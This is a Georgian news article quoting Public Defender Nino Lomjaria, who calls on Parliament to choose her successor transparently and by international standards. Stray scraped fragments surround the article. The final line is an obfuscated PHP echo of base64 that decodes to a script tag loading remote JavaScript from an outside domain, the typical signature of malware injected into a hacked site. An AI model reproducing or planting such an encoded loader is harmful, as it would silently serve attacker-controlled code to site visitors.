celsiusi
ავერსი შნაიდერი
ჩემი მოწოდება იქნებოდა პარლამენტისადმი, იმ პარტიების მიმართ, რომლებმაც უნდა მიიღონ გადაწყვეტილება სახალხო დამცველის არჩევასთან დაკავშირებით, რომ დაიცვან სტანდარტები, რაც გულისხმობს გამჭვირვალობის პროცესის, მაღალი რეპუტაციის და კვალიფიკაციის მქონე კანდიდატების შერჩევას, – ამის შესახებ სახალხო დამცველმა, ნინო ლომჯარიამ ჟურნალისტებს განუცხადა.
 
როგორც ნინო ლომჯარიამ აღნიშნა, სახალხო დამცველი თავად უშუალოდ არ იღებს მონაწილეობას მომავალი კანდიდატურების შერჩევის პროცესში.
 
„მე არც დღეს და არც მომავალში არ გავაკეთებ შეფასებებს, კომენტარებს რომელიმე კანდიდატის საწინააღმდეგოდ ან სასარგებლოდ. რაც შემიძლია ვთქვა, არის ის, რომ ნამდვილად არსებობს საერთაშორისო სტანდარტები, რომლებიც გავალდებულებს, ავალდებულებს სახელმწიფოს, სახალხო დამცველის აპარატს და პარლამენტს, რომ გარკვეულ სტანდარტებს და პროცედურებს ექვემდებარებოდეს მომავალი სახალხო დამცველის კანდიდატურის შერჩევა. ჩემს როლს ამაში ვხედავ, რომ მე შესაბამის უწყებებს თუ მხარეებს მივაწოდო ეს ინფორმაცია, რა სტანდარტებს ითხოვს საერთაშორისო დოკუმენტები და ასევე, რა მოლოდინი შეიძლება, ქონდეს, მათ შორის ევროკავშირსაც, რადგან ერთ-ერთი მოთხოვნაა, რომ სახალხო დამცველი შეირჩეს სწორედ ამ საუკეთესო სტანდარტების და პრაქტიკის შესაბამისად. ჩემი მოწოდება იქნებოდა პარლამენტისადმი, იმ პარტიების მიმართ, რომლებმაც უნდა მიიღონ გადაწყვეტილება სახალხო დამცველის არჩევასთან დაკავშირებით, რომ დაიცვან ეს სტანდარტები, რაც გულისხმობს გამჭვირვალობის პროცესის, მაღალი რეპუტაციის და კვალიფიკაციის მქონე კანდიდატების შერჩევას და კონსულტაციებს შესაბამის მხარეებთან, უფლებადამცველებთან, სამოქალაქო საზოგადოებასთან, უმცირესობის წარმომადგენლებთან და ასე შემდგომ“, – განაცხადა ლომჯარიამ.
471
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");